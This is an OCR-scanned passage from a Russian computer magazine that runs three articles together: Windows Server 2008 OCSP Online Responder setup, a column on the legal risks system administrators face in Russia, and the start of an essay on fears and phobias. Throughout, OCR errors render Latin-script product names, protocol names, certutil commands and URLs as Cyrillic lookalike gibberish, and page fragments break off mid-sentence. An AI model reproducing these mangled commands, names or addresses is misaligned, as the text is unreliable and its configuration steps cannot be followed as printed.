При проверке валидности сертификата среди прочего проверяет- 
ся срок его действия и состояние отзыва. Сертификат может быть 
отозван, как в случае компрометации ключа, так и при изменении 
информации о владельце, например, смене должности или фамилии. 
Традиционно информация об отозванных сертификатах помещается 
в списки отзыва (СКЬ (сепШсаіе геѵосагіоп Іізі)) • Чтобы узнать, был 
ли отозван сертификат, надо получить список отзыва и проверить 
наличие в нем рассматриваемого сертификата. Если в организации 
большое количество сертификатов, то список будет быстро расти, а 
клиенты при проверке статуса сертификата будут ждать закачки спис- 
ка. Кроме обычных списков существуют еще и разностные (Бека СКЬ), 
которые содержат в себе только информацию о сертификатах, статус 
которых был изменен по сравнению с предыдущим списком отзыва. 
Бека СКЬ частично решают проблемы с объемом списков отзыва, но не 
решают всех проблем, связанных с актуальностью информации. Так 
как списки публикуются с заданным интервалом, то может быть такая 
ситуация, что сертификат уже отозван, а информации об этом в СКЬ 
еще нет. 

В ѴѴіпбоѵѵз Зегѵег 2008 появились сетевые ответчики (ОпНпе 
Кезропбег) . Их можно использовать как альтернативу или в допол- 
нение к спискам отзыва сертификатов. Компонент ОпНпе Кезропбег 
использует протокол ОС5Р (ОпНпе СегЫісаЩ ЗіаШз РгоЮсоІ), 
описанный в КЕС 2560. Ответчик разбирает запросы от клиентов, 
оценивает статус сертификата и отправляет обратно подписанный 
ответ с информацией о статусе запрошенного сертификата. В случае 
если клиенту требуется информация о статусе большого количества 
сертификатов, то целесообразно использовать списки отзыва, так как 
их достаточно получить один раз, без необходимости многократных 
запросов к серверу. 

Протокол ОС5Р поддерживают клиенты, начиная с ѴѴіпбоѵѵз Ѵізіа. Они 
могут быть настроены с помощью новых параметров групповой поли- 
тики (СепШсаіе РаШ Ѵаіібагіоп Зетп^з вкладка Кеѵосагіоп) . 

В отличие от использования списков отзыва, ОпНпе Кезропбег тре- 
буется вначале установить и настроить. Для этого надо выполнить 
следующие шаги: 

1. Добавить компонент ОпНпе Кезропбег роли АБ С5. Для работы 
ОпНпе Кезропбег требуется 115, который будет автоматически предло- 
жено установить. 
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Мастер добавления Веѵосаііоп Сопіідигаііоп 



2. В свойствах СА для АІА указать путь, по которому доступен ответчик. 

3. Так как ответ о статусе сертификата подписывается, то для 
работы Опііпе Кезропбег требуется соответствующий сертификат. 
Сертификат, который будет использоваться ответчиком, должен 
обладать следующими атрибутами: короткий срок действия 
(несколько недель), наличие расширения іб-ркіх-осзр-посЬеск и 
расширенного использования ключа іб-кр-ОС5Р5і§піп§, отсутс- 
твие СЭР и АІА. 

Эти атрибуты уже настроены в шаблоне ОС5Р Кезропзе 5і§піп§. 

В случае использования Епіегргізе СА надо только добавить его к 
доступным шаблонам в Асгіѵе Эігесіогу, настроив на него разре- 
шения (Кеаб и ЕпгоП) для сервера, на который установлен Опііпе 
Кезропбег. Для ЗіапбАІопе САнадо еще менять значение соответс- 
твующего флага командой сегшгіі -ѵ -зеіге^ роНсу\ебпПа§5 +ЕБІТЕ_ 
ЕПАВІЛЮС5РКЕѴЛОСНЕСК. Действия по настройке шаблона в 
ѴѴіпбоѵѵз Зегѵег 2003 отличаются и здесь не рассматриваются. 

4. На последнем этапе необходимо настроить сам сетевой ответчик. 
Для этого в оснастке Опііпе Кезропбег Мапа^етепі: с помощью мастера 
надо создать геѵосагіоп сопй^игагіоп. 

5. Для корректной работы Опііпе Кезропбег в период, когда происходит 
обновление ключа СА, необходимо разрешить обновления сертифика- 
тов Опііпе Кезропбег с использованием существующих ключей центра 
сертификации. Для этого надо выполнить на СА команду сегшгіі -зеіге^ 
саМбзеЭейпебСАСеггіпКециезі: 1. Данное действие необходимо для 
получения возможности подписывать ответы Опііпе Кезропбег с помо- 
щью сертификата, подписанного тем же ключом СА, который исполь- 
зовался для подписания сертификата, статус которого запрашивается. 
В ѴѴіпбоѵѵз 2003 для разрешения этой ситуации необходимо вручную 




Настройка АІАдля Опііпе Резропсіег 



создать столько сертификатов для подписи ответов ОС5Р, сколько тре- 
буется, чтобы покрыть срок действия двух сертификатов СА. При этом 
срок действия каждого из выпущенных сертификатов должен быть на 
две недели больше, чем у предыдущего. 

ЗАКЛЮЧЕНИЕ 

Видоизменения служб сертификации производились и в ѴѴіпбоѵѵз 
Зегѵег 2008, и в К2. В итоге появились возможности, которые будут 
интересны специалистам по безопасности, инструменты, которые 
облегчат жизнь администратора, и функции, которые позволят поль- 
зователям еще меньше разбираться в сертификатах. 

Во-первых, добивалась поддержка новых протоколов и криптог- 
рафических алгоритмов. Протокол ОС5Р, который уже не один 
год присутствовал в других программных продуктах, наконец-то 
дошел до серверных ОС Місгозогі. Таким образом, у админист- 
раторов и программистов появились различные варианты для 
проверки статуса отозванных сертификатов, которые позволяют 
выбирать между скоростью, объемом данных и актуальностью 
информации. Немаловажно и появление поддержки алгоритмов 
на эллиптических кривых. К сожалению, поддерживаются не 
российские, а американские стандарты, но ожидать иного было 
бы странно. 

Во-вторых, многие библиотеки (например, Сгурш АРІ иХЕпгоІІ.бП) пе- 
реписаны с нуля, из-за чего можно надеяться на избавление от старых 
ошибок и проблем, и ждать новых. 

В-третьих, значительно расширились способы запроса и получе- 
ния сертификатов. Теперь сертификаты могут получать и сетевые 
устройства без записи в домене, и пользователи без прямого доступа 
к сети с СА. 

И наконец, без внимания не оставлены и любители автоматизации и 
скриптописания - новые объекты и функции позволят им реализовать 
свои фантазии, пг 
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■ ■ Николай Николаевич Федотов, главный аналитик компании «Іп^оѴѴаІсИ» 



Риски системного 
администратора 



СЕМЬ И ЕЩЕ ОДИН СПОСОБ ПОДВЕСТИ СИСАДМИНА 
ПОД МОНАСТЫРЬ 

Со временем работа в должности сисадмина становится все более 
и более рискованной. Ведь на самом деле администратор рулит нетех- 
никой, а деньгами, нематериальными активами, людьми, репутацией 
компании. Соответственно с этим — и его ответственность. 



ДЕРЖАЩИЙ ЗА ЧУВСТВИТЕЛЬНЫЕ МЕСТА 

Чем дороже может обойтись инцидент, тем строже отбор в соот- 
ветствующую профессию. Для управления атомной станцией или 
подлодкой-носителем ЯО персонал тестируют тщательнее. Алкоголи- 
кам, суицидникам, буддистам и пох... фаталистам там не место. Для 
того, чтобы держать в руках автомат Калашникова, отбор не такой 
строгий: отсеивают лишь откровенных психов и уголовников. Осталь- 
ным оружие можно (некоторым даже нужно, помимо их желания) . 
Чтобы иметь право сесть за руль автомобиля (источник повышенной 
опасности), также требуется доказать, что претендент в состоянии от- 
вечать за свои действия. И получить соответствующий документ. Для 
управления компьютером специальной лицензии не предусмотрено. 
Считается, что неумелый или неадекватный человек перед монито- 
ром может навредить лишь себе самому и своим данным. Так оно и 
было лет двадцать назад. 

Ситуация меняется довольно быстро. Информация дорожает. Ком- 
мерческая тайна, интеллектуальная собственность, инсайдерская 
информация растут в цене быстрее золота, а по объему — так их просто 
пучит. Прощелкав вирус, можно парализовать на полдня работу офиса. 
А украв ма-а-а-аленькую флешку с тремя миллионами записей, можно 
выручить на черном рынке аж 50 американских центов. . . за каждую 
запись. 

Кроме того, рассказывают (но чаще показывают в фильмах), что кое-где 
компьютеры подключены к разным автоматизированным производс- 
твам и к интернету одновременно. И существует теоретическая воз- 
можность несколькими коварными кликами мыши из-за моря уронить 
спутник, самолет, курс местной валюты или даже авторитет местного 
президента. Вероятность, конечно, очень малая, но зато потенциаль- 
ный ущерб огромен. Их произведение (стоимость риска) получается 
внушительное. Ответственность админа — соответствующая. 

До лицензий на право управления компьютером пока не додумались 
(вернее, додумались, но никто не горит желанием возложить на себя 
часть ответственности за то, что станут вытворять в Сети пользователи 
с выписанными ими «правами». А простую бумажку «Сотрілег Дгіѵе 
Нсепсе» могут выписать любому желающему) . 

Однако, важность (опасность) сисадмина уже осознали. Поэтому в 
серьезных конторах его производственные функции делят между 
двумя-тремя работниками. Чтобы один знал, но не мог, другой мог, 
но не знал, а третий (родственник директора) приглядывал за этими 
двумя грамотеями, чтобы они не сговорились. Впрочем, читателя, 
наверное, волнуют совсем другие риски: что грозит самому админу 
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в случае неудачного сочетания звезд над его головой. Перечислим 
основные риски. 

НЕПРЕРЫВНОСТЬ БИЗНЕСА 

Первый и основной риск сисадмина — самый неинтересный. Если он 
будет нерадиво исполнять должностные обязанности, и из-за этого 
предприятие понесет убытки, у руководства может возникнуть идея 
подвергнуть его не только дисциплинарной ответственности, но и 
получить возмещение убытков в гражданском порядке. При этом не 
так важно, что именно написано в трудовом договоре: каждый человек 
должен возмещать причиненные им убытки. Кроме того, руководству 
предприятия тоже надо отчитываться: перед акционерами, перед 
кредиторами и партнерами, перед регулирующими органами. Любые 
неудачи и потери, связанные с компьютерной техникой, логичнее всего 
перевалить на админа. Все равно кроме него в этих гудящих электрон- 
ных штуках никто не разбирается. 

В практике автора был такой случай. Предприятие, оказываю- 
щее услуги связи, подошло к грани полного банкротства: доходы 
падают, работники разбегаются, кредит поспел, а возвращать его 
нечем. И тогда директор делает отчаянную попытку спасти положе- 
ние, а точнее — свалить вину на другого. Выявляется один случай 
хищения (через подтасовку данных в биллинговой системе), в этом 
обвиняется самый беззащитный из работников (недавно уволив- 
шийся), фальсифицируются доказательства и подается соответс- 
твующее заявление в правоохранительные органы. При полном 
бардаке на предприятии и десятках недовольных, не получающих 
зарплату работниках найти один случай хищения — не проблема. 
Проблемой было бы не замечать воровства. Вписать в лог-файл 
нужный ІР-адрес и закрепить это актом осмотра — тоже не вопрос 
(некоторые из инженеров отказались подписывать этот акт, но 
следствие это обстоятельство не заинтересовало) . Далее дело 
пошло по давно накатанной (кое-где у нас порой) обвинительной 
колее. «Правильные» показания свидетелей собирались, «непра- 
вильные» игнорировались. На одного подозреваемого валили все 
хищения, нарушения и недостачи, все причастные это с радостью 
подтверждали. Нашли послушного эксперта, который и написал в 
заключении то, что велел следователь. Дело сшито и передано в суд. 
У руководства появились оправдания перед кредиторами — де- 
скать, это не мы плохо работали, это вот он все украл. Компания все 
равно разорилась, а сисадмин получил срок по статье 272 (неправо- 
мерный доступ) . 
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САБОТАЖ 

Как известно, работники выражают свое недовольство разными 
способами. Одни сводятся к неисполнению обязанностей, другие — к 
пунктуальному и дословному их исполнению. В обоих случаях все 
ломается и стопорится (конкретные причины айтишного саботажа 
смотри на диаграмме) . То и другое именуется «саботаж», а в отдельных, 
запущенных случаях — вредительство. 

В области ІТ то и другое можно осуществить нажатием нескольких кла- 
виш. Больше всего возможностей учинить саботаж или пресечь его — у 
админа. С него и главный спрос. 

Но даже когда все сломалось по стихийным причинам, у начальства 
часто появляется подозрение на злой умысел. Во времена иные стихии в 
технике вообще не признавали: техника-де вещь детерминированная, 
если что-то пошло не так, то кто-то это устроил — найти и наказать ! В 
конце XX века прогрессивные мыслители, адепты гуманизма додума- 
лись до концепции техногенной катастрофы. Этот термин означает, 
что стихийная сила может действовать не только в дикой природе, 
но и в недрах творения рук человеческих, в программном обеспече- 
нии, в частности. Ученые признали, что современная техника вовсе 
не детерминирована и вполне может непредсказуемо выйти из-под 
контроля. Но эту правовую новеллу далеко не все принимают. Поэтому 
попытки обязательно найти виновного продолжаются. Не найти — так 
назначить. 

От этого назначения сисадмин может спастись лишь составлением 
правильных бумаг. Причем своевременным составлением. Когда техно- 
генная катастрофа местного масштаба произошла, писать объясни- 
тельные уже поздно. Следует пригласить юриста и поработать над бю- 
рократическим прикрытием своей филейной части заблаговременно. 

АВТОРСКИЕ ПРАВА 

Так называемые права интеллектуальной собственности на программы 
для ЭВМ и прочий цифровой контент не только дорожают (причем не за 
счет повышения цен на каждую лицензию, а за счет увеличения числа 
объектов интеллектуальной собственности в деятельности предпри- 
ятия и скорости смены «поколений» софта) . Кроме того, обостряется 
борьба за них. Как логично рассудил товарищ Сталин в 1928 году, 
классовая борьба должна постоянно обостряться, поскольку буржуи не 
будут молча терпеть, когда начнется индустриализация, которая сведет 
на нет роль частной собственности в СССР. А поэтому нужны посадки. 

С каждым годом все больше. То ли Вождь все верно рассчитал, то ли 
решение задачи подогнали под ответ, но репрессии против буржуев и их 
приспешников пошли с этого года нарастающими темпами. Совер- 



шенно аналогичная ситуация сложилась с авторскими правами в наше 
время. Пираты, согласно расчетам В5А и ІРРІ, должны наносить ущерб 
правообладателям во все возрастающих масштабах. Поэтому наказа- 
ния за соответствующие нарушения должны постоянно ужесточаться. 
Так оно и происходит. 

Ныне в России за нарушение авторских прав в размере меньше 50 тысяч 
рублей предусмотрена административная ответственность (ст. 7.12 
КоАП), а для большего размера — уголовная (ч. 2-3 ст. 146 УК). Плюс 
гражданско-правовая в качестве довеска в обоих случаях. 

Гражданскую ответственность может нести как физлицо, так и пред- 
приятие. А вот уголовную разрешается возлагать только на человека. 
Поэтому требуется козел отпущения. Им часто становится сисадмин. 

По закону, отвечать должен тот, кто инсталлировал контрафактное ПО, 
причем лишь в том случае, если точно знал, что оно контрафактное (то 
есть, предприятие не заключило лицензионный договор с правообла- 
дателем) . На практике с органов требуют план по раскрываемости и ор- 
ганы его дают. План обычно таков, что времени на сбор доказательств 
очень мало. Так что, если в вашем хозяйстве водится контрафактного 
софта более чем на 50 000 совокупно, вы имеете высокие шансы сде- 
латься козлом отпущения, если что. 

Понятно, что благородных донов, желающих взять на себя ответствен- 
ность за контрафакт, среди работников не найдется. Скорее всего, все 
они дружно по подсказке следователя укажут пальцем на админа: «Это 
он все устанавливал». А показания свидетелей в судах «весят» значи- 
тельно тяжелее, чем всякие компьютерно-технические экспертизы и 
заключения специалистов. 

На практике чаще всего делают обвиняемым именно администратора 
или эникейщика. Так называемое «дело Поносова» представляло собой 
своего рода исключение: обвиняемым стал директор организации, а не 
сисадмин. Чаще вину сваливают (тоже по должности, а не по вине) на 
безответного и юридически безграмотного сисадмина. 

Кроме программ для ЭВМ, объектами авторского права являются 
фонограммы (музыка, аудиокниги), аудиовизуальные произведения 
(фильмы, клипы), художественные тексты, объекты изобразительного 
искусства (рисунки, фотографии, элементы дизайна), а также шрифты. 
Все эти объекты в цифровой форме, если они не оплачены, при необхо- 
димости зачтутся в общую сумму нарушений. 

Для возбуждения дела заявления правообладателя не требуется. Если 
не найдут потерпевшего (его полномочного представителя в Рос- 
сии), то могут обойтись и без его участия (за подробностями прошу 
проследовать в ЧаВо по компьютерным преступлениям от сетевых 
правоведов: Ьнр://ѵѵѵѵѵѵ.ішегпец1аѵѵ.ги/іпі:1аѵѵ/сгіте/1ад.1іі:т) . Автор 
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статьи частенько выступает в роли эксперта или специалиста по таким 
уголовным делам. Но защитить подсудимого очень трудно — как 
правило, уже поздно. Кое-что можно сделать на этапе предварительно- 
го следствия, до назначения экспертизы, а дальше уже труднее. После 
окончания следствия, на судебном заседании, помочь практически 
нечем. Самая эффективная защита от несправедливого (а также и час- 
тично справедливого) обвинения в нарушении авторских прав на ПО 
может быть оказана до того, как в офис пришли «с проверкой» или уже с 
постановлением на обыск. 

СЛУЖЕБНОЕ ПРОИЗВЕДЕНИЕ 

Этот риск также связан с авторскими правами. Но здесь строгость 
закона играет уже на другую сторону. Как известно, админу трудно 
обойтись без создания собственных программ. Небольшие шелл-скрип- 
ты, макросы для М5 ОШсе, какая-нибудь учетная БД и веб-интерфейс к 
ней, ЗС^Ь-функция, однострочный Іаѵа-скрипт на веб-страничке и так 
далее. Все это — объекты интеллектуальной собственности. Права на 
них принадлежат предприятию, если в трудовом договоре прописана 
обязанность работника создавать такие программы (это называется 
«служебное произведение», ст. 1295 ГК РФ) . Если не прописана, то все 
права остаются у автора. Сисадмин мог уже и сам забыть об этом, сме- 
нить место службы, но его скрипт, его интеллектуальная собствен- 
ность исправно работает на сервере предприятия и при этом являет- 
ся контрафактной. Будучи правообладателем, бывший работник (и 
даже не бывший) может предъявить претензии к нарушителю авто- 
рских прав. В этом случае вся текущая истерия по поводу пиратства 
и все перекосы в законодательстве будут играть на стороне автора. 
Таких юридических мин замедленного действия типичный сисад- 
мин оставляет за собой кучи. Их вполне может набраться на 50 000 
рублей (уголовная ответственность), а уж на гражданскую хватит в 
любом случае. Защищаться от этого риска выгоднее всего при найме 
работника. К тому времени, когда он решил уволиться, разрулить 
ситуацию встанет существенно дороже. 

ВРЕДОНОСНЫЕ ПРОГРАММЫ 

Создание и использование вредоносных программ (ч. 1 ст. 273 УК) 

— это деяние, наказуемое в случае умышленного его совершения. 

По неосторожности оно будет преступлением (ч. 2 той же статьи) 
только в случае тяжких последствий. До сих пор вторая часть ни разу 
не применялась. Кстати говоря, «Тяжкие последствия» — это нечто 
наподобие показанного в фильме «Крепкий орешек-4», но российс- 
кая техника еще не настолько интернетозависима. 

Сисадмин рискует попасть под 273-ю статью, если он установит на 
компьютер работника троянскую шпионскую программу — боль- 



От редакции: 
голосуй 

или проиграешь 

О том, насколько тебе нравится или не нравится появление 
«не-технической» информации в рамках этой рубрики, 
ты всегда можешь высказаться на Ьцр: //^гоир.хакер.ги . 
Голосуй! Требуй! Предлагай! Кроме того, почта редактора 
рубрики: І020ѵ$ку@зате1апс1.ги тоже находится в твоем 
полном распоряжении. Пиши туда и, если наше сегодняшнее 
начинание встретит одобрение определенного количества 
читателей, мы продолжим рассматривать тему рисков сис- 
темного администратора более подробно, а заодно коснемся 
и некоторых других правовых вопросов функционирования 
информационных систем и людей, с ними работающих. 



шинство программ этого класса являются вредоносными. Автору 
несколько раз рассказывали знакомые и клиенты, как начальник 
требовал от админа поставить программу-шпион кому-то из 
подчиненных. Получение приказа не освобождает исполнителя от 
уголовной ответственности, если приказ заведомо незаконный (ч. 2 
ст. 42 УК), а в случае троянской программы это так. 

Кроме того, сисадмин в своей работе иногда использует иные 
программы двойного назначения: кейгены, сниферы, подборщики 
паролей, сканеры. Они вредоносными не являются, но следователь и 
его «карманный» эксперт могут этого не знать. Или не хотеть знать. 
На практике достаточно много случаев, когда статью 273 рисуют 
без любых на то оснований за всякие «нехорошие», но отнюдь не 
вредоносные программы (ахтунг — вредоносной является не любая 
программа, причиняющая вред. И наоборот, принести вред может 
вполне законная программа) . Оправдаться от такого обвинения 
достаточно сложно в силу полного отсутствия специальных знаний 
у милиции и судей. Был интересный случай , когда под статью за 
вредоносные программы попали авторы хорошо известной и попу- 
лярной программы «КС В 5ру». Им удалось в конце концов доказать 
свою невиновность (не без содействия автора), но чего им это 
стоило! Если программист не так известен и не настолько состояте- 
лен, он может и не оправдаться от обвинений. Установить, является 
ли программа вредоносной, можно, самостоятельно разобравшись 
во всех технико-правовых тонкостях вопроса, а можно обратиться к 
специалисту. Стоит ли напоминать, что делать это надо как можно 
раньше, пока «болезнь» еще не запущена. 

ТАЙНЫ 

Законодательство предусматривает несколько десятков видов тайн, 
то есть конфиденциальной информации, подлежащей обязатель- 
ной защите (список конкретных тайн можно найти, например, тут: 
Ьі:і:р://іп1оѵѵаі:с]і.1іѵеіоигпа1.сот/55585.]іі:т1) . Совсем недавно при- 
бавился еще один вид — так называемая инсайдерская информация, 
ее следует защищать, даже если она не конфиденциальна. 

Прикол в том, что ответственность за утечку (разглашение, утрату, 
неправомерное использование) этой информации предусмотрена 
далеко не всегда. А вот ответственность за нарушение предусмот- 
ренного порядка ее защиты — обязательно. Именно в последнем 
нарушении содержатся основные риски. 

Например, персональные данные. Ответственности за их утечку 
(разглашение) нет. Но есть ответственность за нарушение установ- 
ленных правил обработки персональных данных (ст. 13.11 КоАП). 
Всякому понятно, что утечка может произойти несмотря на соблюде- 
ние всех положенных правил. И наоборот, фактически защитить дан- 
ные можно без оформления предписанных формальных процедур 
и бумаг. Особенно — без бумаг. Но на практике проверяют как раз 
документы и штрафуют за их отсутствие. 

Другая опасная для сисадмина тайна — это тайна связи (формально 
именуемая «тайна переписки,телефонных переговоров, телеграф- 
ных и иных сообщений», ч. 2 ст. 23 Конституции) . «Иные» — это 
как раз электронная почта, ІС(2 и прочие интернет-коммуникации, 
содержание которых так интересно для типичных начальников, не 
принимающих всерьез термин «права человека». 

Существует распространенное заблуждение, что служебные 
коммуникации якобы можно просматривать/прослушивать без 
согласия работника. Другой вариант той же сказки — что работника 
якобы достаточно официально уведомить, после чего перлюстрация 
становится законной. В США, то есть на родине фильмов и приклю- 
ченческих романов, из которых это заблуждение почерпнуто, дело 
обстоит действительно так. Но на родине прав человека — в Европе, 
а заодно и в России, конституции устроены немного иначе. 

Ни уведомление, ни право собственности на средства связи не дает 
работодателю возможность перлюстрировать электронную почту и 
другие служебные каналы связи. Требуется письменное (и притом 
добровольное) согласие абонентов; впрочем, и оно в некоторых 
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случаях будет недействительно (подробнее — Ьарі/Логепзісз.ги/ 
гі-із.ЬшіГ) . 

Правда, работники-правозащитники находятся редко. Поэтому тай- 
на связи нарушается на российских предприятиях сплошь и рядом. 
Если на таком нарушении все-таки поймают, то сисадмин — первый 
кандидат в обвиняемые, а отдавший приказ начальник может и 
отвертеться. 

ЛИЦЕНЗИРУЕМАЯ ДЕЯТЕЛЬНОСТЬ 

В России существует достаточно много видов деятельности, тре- 
бующих лицензии. Получать их долго и муторно, а иной раз без 
соответствующих связей и вообще невозможно. Кроме того, случаи, 
когда следует иметь лицензию, а когда нет, определены в законах не 
вполне четко. Подробности отданы на откуп ведомствам, которые и 
лицензируют тот или иной вид деятельности. Ведомства определяют 
границы лицензирования так, как им удобно, и иногда передвигают 
их без предупреждения. 

Однако за работу без лицензии предусмотрена уголовная ответс- 
твенность (ст. 171 УК) . По этой статье чаще всего привлекают 
руководителя предприятия, но сисадмин тоже может попасть под 
раздачу, особенно если фактическую деятельность осуществлял он. К 
таковым занятиям относятся: услуги связи, обслуживание шифро- 
вальной техники, техническая защита информации и некоторые 
иные виды деятельности. 

ДРУГИЕ 

А еще сисадмин иногда становится объектом шантажа, угроз или 
подкупа со стороны желающих проникнуть в информационную сис- 
тему предприятия, завладеть коммерческой тайной. Наслушавшись 
квазиглубокомысленных изречений в духе «человек — слабейшее 
звено защиты», некоторые злоумышленники и начинают атаку с 
этого звена. А кто у нас по умолчанию имеет высший допуск и макси- 
мальные технические полномочия? Админ. Вот его и прессуют, его и 
подкупают. Иногда внешние злоумышленники, а порой и представи- 
тели внутренних группировок. 

Отвечать на такие вызовы и ориентироваться в раскладе сил (чтоб 
вовремя стать на сторону победителя) технический специалист, как пра- 



вило, не способен. Поэтому рискует остаться виноватым, даже если он и 
не виноват. А уж если поддался на угрозы, посулы и взятки, так тем более 
будет сделан ответственным за все. Выиграть у прожженных бюрокра- 
тов на их поле по их правилам технарь не может. Даже не надейтесь. 
Действенный способ защиты для админа — не иметь неограни- 
ченного доступа ко всей конфиденциальной информации. То есть 
учинить разделение полномочий, которое и рекомендуется стандар- 
тами по информационной безопасности. 

Также на памяти автора были случаи, когда админов привлекали к 
ответственности за слишком ревностную или чересчур усердную за- 
щиту своих ресурсов (и подобных случаев было гораздо больше двух) . 
Борясь со спамом, БоЗ-атаками, фишингом, порнографией и прочими 
онлайновыми и оффлайновыми грехами, технари часто излишне усерд- 
ствуют. И переходят грань закона, нарушая права других людей — самих 
защищаемых пользователей или вообще людей непричастных. Далеко 
не все средства защиты приемлемы. Администратор и даже работник 
интернет-провайдера — это не следователь, не судья и не палач, хотя 
частенько и норовит выполнять все три роли одновременно. 

Делать так не стоит. Конечно, большинство пользователей — нич- 
тожные черви и бесправные рабы. Но все чаще попадаются среди них 
персонажи с прокачанным скилом «право/юриспруденция». И они 
могут поставить борцуна на место оригинальным способом — на- 
правлением заявления в милицию, ФСБ или подачей искового заяв- 
ления в суд. А эти органы склонны руководствоваться оффлайновыми 
законами и полностью игнорировать «сетевые нормы» и понятия. 

ЗАКЛЮЧЕНИЕ 

Только с первого взгляда сисадмин взаимодействует с техникой. На 
самом деле каждой настройкой, каждой буквой в конфиг-файле, 
каждым заблокированным пакетом, каждой командой в консоли он 
воздействует на отношения между людьми. Не просто отношения, 
но те отношения, которые затрагивают права и свободы личности, 
а также деньги. Отношения, которые защищены законом. Неудиви- 
тельно, что законы эти массово нарушаются. 

Как видно, риски сисадмина лежат в правовой сфере. Не имея соот- 
ветствующего образования, разобраться в них трудно. Поэтому не 
надо стесняться спрашивать совета и учиться, т 
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БОЯТЬСЯ НЕЛЬЗЯ ИГНОРИРОВАТЬ 

Страхи, фобии и их вариации: эмоции, отравляющие 
жизнь, или приятная доза адреналина? 



Если бы не это «замечательное» чувство, Хичкок, Шьямалан и дру- 
гие создатели хоррора в кинематографе остались бы без работы, а 
водители, высотники и другие, чья деятельностьсвязана с риском 

— безжизни. 



Страх присущ практически любому мысляще- 
му существу нашей планеты, и особенно — в 
нашем веке, когда с каждым годом увеличи- 
вается количество новых фобий в словарях и 
количество новых пациентов у психологов и 
психиатров. 

Страх 

Страх — это эмоция. Такая же, как радость, 
веселье, волнение, скука, только, как прави- 
ло, более интенсивная и хорошо ощущаемая. 

И также, как и для других эмоций, для него 
характерны специальные условия воз- 
никновения: в ситуациях, когда человеку 
(или животному] что-то угрожает, причем 
необязательно объективно — при опасении 
или предвкушении угрозы тоже возникает 
это леденящее душу ощущение; итакже, как 
при других эмоциях, в это время происходят 
характерные физиологические и химические 
реакции в организме, не говоря уже о пси- 
хологических. Эмоция страха колеблется от 
слабого до сильного, и в зависимости отэтой 
характеристики она меняет название: тре- 
вожность (неосознаваемый страх], опасение, 
боязнь, испуг, паника, ужас. 

Всего лишь миллион лет назад страхи у 
людей были только инстинктивными — когда 
человек боялся грома, хищников, стихийных 
бедствий, огня, и в этом ничем не отличался 
от животных. Но человеку свойственно раз- 
виваться, расти духовно и эмоционально; и 
каку любого явления, у развития есть свои не- 
гативные стороны — вместе с продвинутостью 
у человека появился страх невротический. 
Теперь боязнь огня отходит на второй план, 
намного ужаснее кажется факт увольнения, 



кары господней, что про него нетак подумают 
или плохо оценят... Именно стакими пробле- 
мами люди приходят к психологам, колдунам, 
в церковь. 

Фобии 

Фобия (рбоЬоз] в переводе с греческого 
означает страх или боязнь. Но в современном 
языке фобия — это далеко не просто страх, — в 
отличие от обычного страха, фобия устойчива, 
постоянна и не имеет осознаваемых причин, 
то есть иррациональна. 

Например, если человек боится перехо- 
дить дорогу по пешеходному переходу, то ты 
предположишь, что его когда-то на «зебре» 
сбила (или чуть не сбила] машина, или он стал 
свидетелем ситуации, когда кого-то переехал 
автомобиль в этой зоне. Страх имеет рацио- 
нальные корни, и, сточки зрения психотера- 
певта, с ним работать легче — ведь причины 
осознаются. 

А вотс фобиями сложнее: какобъяснить, по- 
чему человек боится взгляда куклы? В первую 
очередь, этого не понимает сам боящийся, 
именно поэтому зачастую приступы фобий со- 
провождаются паническими атаками. 

В целом, есть страхи, которые по неопытности 
можно назвать фобиями: необоснованный 
страх, спонтанно возникающий страх, страх 
непонятно чего, сильная тревожность. Но 
это всего лишь страхи; фобии же оказывают 
давление на жизнь человека, постоянно 
напоминают о себе, руководят действиями, 
приводя к абсурдному поведению. 

Например, женщина, которая боится ездить 
в общественном транспорте (разновидность 
социофобии), потому что ей кажется, будто 



на нее все время оценивающе смотрятлюди, 
сравнивая ее одежду, внешность и аксессуа- 
ры с окружающими. Боясь показаться хуже по 
какому-либо из параметров, она практически 
всю зарплату тратит на такси. Невротический, 
лишенный оснований, хоть и осознаваемый 
страх, в данном случае является фобией. 

Природа страхов 

Если говорить о естественном, животном 
страхе — его природной причиной является 
инстинкт самосохранения. 

Причин, вызывающих невротический страх, 
великое множество, и они совершенно раз- 
нообразны. Но они всегда есть, страх не воз- 
никает на пустом месте. Резко и неожиданно 
залаяла собака — впоследствии ты всю жизнь 
можешь их избегать; есть неуверенность 
в своем профессионализме — ты ужаса- 
ешься от вида начальника и каждый день с 
замиранием сердца и холодом в солнечном 
сплетении ждешь новости об увольнении; 
нетощущения своей ценности — ты боишься 
мнения и оценки окружающих. 

Еще одной причиной страхов является 
неизвестность: ты не знаешь, что тебя 
ждет, не знаешь, как реагировать на то, что 
произойдет, боишься, что не успеешь во- 
время сориентироваться и принять верное 
решение. Почемулюди часто боятся разных 
малоизвестныхживотных или насекомых? 
Потому что они в корне отличаются от нас, 
выглядят иначе (незнакомо], мы о них ничего 
незнаем, не можем прикинуть, что они думают 
и как себя ведут; в итоге возникает состояние 
неопределенности, которое в большинстве 
случаев порождает страх. 
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Может, ты с ужасом ждешь визита отдела по 
борьбе с киберпреступностью? А кто-то не 
боится, он просто подготовился на случай 
такого «посещения» и знаетточно, как будет 
действовать, если сотрудники Управления 
«К» заглянут к нему в гости. Нет неопреде- 
ленности — нет страха. Даже если ты точно 
знаешь, что тебя впереди ждет что-то плохое, 
ты уже не боишься, а либо смиряешься, либо 
готовишься, либо ищешь варианты изменить 
ситуацию, но не боишься, — что и следовало 
доказать. 

Страхи, порождаемые 
социумом 

С одной стороны, можно утверждать, что 
страх — это субъективная эмоция, и каждый 
индивид сам себе придумывает, чего бояться, 
а чего — нет. Но не все так просто на самом 
деле. Человек, находясь в состоянии страха, 
слабо анализирует происходящее вокруг, не 
способен трезво оценивать обстоятельства, у 
него одна задача — избежать опасности, из- 
бавиться от чувства страха, и все умственные 
усилия направлены на это. Такой особенно- 
стью психики живого существа (да-да, это 
касается не только людей] давно пользуются 
многие манипуляторы. О них мы поговорим 
чуть позже, а сейчас я приведу для иллюстра- 
ции простой пример срабатывания инстинкта 
самосохранения. 

Ты прекрасно знаешь, что животное вряд ли в 
здравом уме побежит навстречу охотнику, ибо 
это нонсенс и абсурд. Но мы изменим условия 
и предположим, что перед оленем охотниксо 



страшным ружьем, а сзади, слева и справа — 
бушует огонь или слышен сильный необыч- 
ный шум; куда он побежит? Понятно, что не в 



огоньинена шум — из двух зол олень выберет 
меньшее. Как видишь, используется подмена 
выбора: вместо «бежать или не бежать к охот- 



ВИДЫ 



СТРАХОВ И ФОБИЙ 



Страхов и фобий очень много. И если страхи носят, как правило, индивидуальный, часто 
неповторимый характер, так как они спровоцированы какими-то реальными событиями, 
которые человек помнит и осознает, то фобии обычно достаточно стандартны. 

